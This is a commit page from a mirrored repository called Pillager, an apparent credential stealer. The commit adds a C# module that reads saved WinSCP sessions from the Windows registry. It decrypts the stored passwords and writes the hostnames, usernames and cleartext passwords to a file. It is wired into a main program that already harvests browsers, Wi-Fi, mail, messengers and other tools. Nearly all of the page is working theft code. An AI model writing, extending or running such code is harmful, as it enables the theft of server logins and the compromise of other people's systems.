qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add WinSCP

This commit is contained in:
簞純 2023-11-18 15:18:18 +08:00
parent 47c9374b59
commit 9da8b74def
3 changed files with 133 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

128
Pillager/FTP/WinSCP.cs Normal file
View File

@ -0,0 +1,128 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Xml;
namespace Pillager.FTP
{
internal class WinSCP
{
public static string FTPName = "WinSCP";
static readonly int PW_MAGIC = 0xA3;
static readonly char PW_FLAG = (char)0xFF;
struct Flags
{
public char flag;
public string remainingPass;
}
private static Flags DecryptNextCharacterWinSCP(string passwd)
{
Flags Flag;
string bases = "0123456789ABCDEF";
int firstval = bases.IndexOf(passwd[0]) * 16;
int secondval = bases.IndexOf(passwd[1]);
int Added = firstval + secondval;
Flag.flag = (char)(((~(Added ^ PW_MAGIC) % 256) + 256) % 256);
Flag.remainingPass = passwd.Substring(2);
return Flag;
}
private static string DecryptWinSCPPassword(string Host, string userName, string passWord)
{
var clearpwd = string.Empty;
char length;
string unicodeKey = userName + Host;
Flags Flag = DecryptNextCharacterWinSCP(passWord);
int storedFlag = Flag.flag;
if (storedFlag == PW_FLAG)
{
Flag = DecryptNextCharacterWinSCP(Flag.remainingPass);
Flag = DecryptNextCharacterWinSCP(Flag.remainingPass);
length = Flag.flag;
}
else
{
length = Flag.flag;
}
Flag = DecryptNextCharacterWinSCP(Flag.remainingPass);
Flag.remainingPass = Flag.remainingPass.Substring(Flag.flag * 2);
for (int i = 0; i < length; i++)
{
Flag = DecryptNextCharacterWinSCP(Flag.remainingPass);
clearpwd += Flag.flag;
}
if (storedFlag == PW_FLAG)
{
if (clearpwd.Substring(0, unicodeKey.Length) == unicodeKey)
{
clearpwd = clearpwd.Substring(unicodeKey.Length);
}
else
{
clearpwd = "";
}
}
return clearpwd;
}
public static string GetInfo()
{
StringBuilder sb = new StringBuilder();
string registry = @"Software\Martin Prikryl\WinSCP 2\Sessions";
var registryKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(registry);
if (registryKey == null) return "";
foreach (string rname in registryKey.GetSubKeyNames())
{
using (var session = registryKey.OpenSubKey(rname))
{
if (session != null)
{
string hostname = (session.GetValue("HostName") != null) ? session.GetValue("HostName").ToString() : "";
if (!string.IsNullOrEmpty(hostname))
{
try
{
string username = session.GetValue("UserName").ToString();
string password = session.GetValue("Password").ToString();
sb.AppendLine("hostname: "+ hostname);
sb.AppendLine("username: " + username);
sb.AppendLine("rawpass: " + password);
sb.AppendLine("password: " + DecryptWinSCPPassword(hostname, username, password));
}
catch
{ }
}
}
}
}
return sb.ToString();
}
public static void Save(string path)
{
try
{
string output = GetInfo();
if (!string.IsNullOrEmpty(output))
{
string savepath = Path.Combine(path, FTPName);
Directory.CreateDirectory(savepath);
File.WriteAllText(Path.Combine(savepath, FTPName + ".txt"), output);
}
}
catch { }
}
}
}

1
Pillager/Pillager.csproj
View File

@ -43,6 +43,7 @@
<Compile Include="Browsers\FireFox.cs" />
<Compile Include="Browsers\IE.cs" />
<Compile Include="Browsers\OldSogou.cs" />
<Compile Include="FTP\WinSCP.cs" />
<Compile Include="Helper\AesGcm.cs" />
<Compile Include="Helper\Asn1Der.cs" />
<Compile Include="Helper\BCrypt.cs" />

4
Pillager/Program.cs
View File

@ -1,5 +1,6 @@
using System.IO;
using Pillager.Browsers;
using Pillager.FTP;
using Pillager.Helper;
using Pillager.Mails;
using Pillager.Messengers;
@ -27,6 +28,9 @@ namespace Pillager
//Others
Wifi.Save(savepath);
//FTP
WinSCP.Save(savepath);
//Tools
MobaXterm.Save(savepath);
Xmanager.Save(savepath);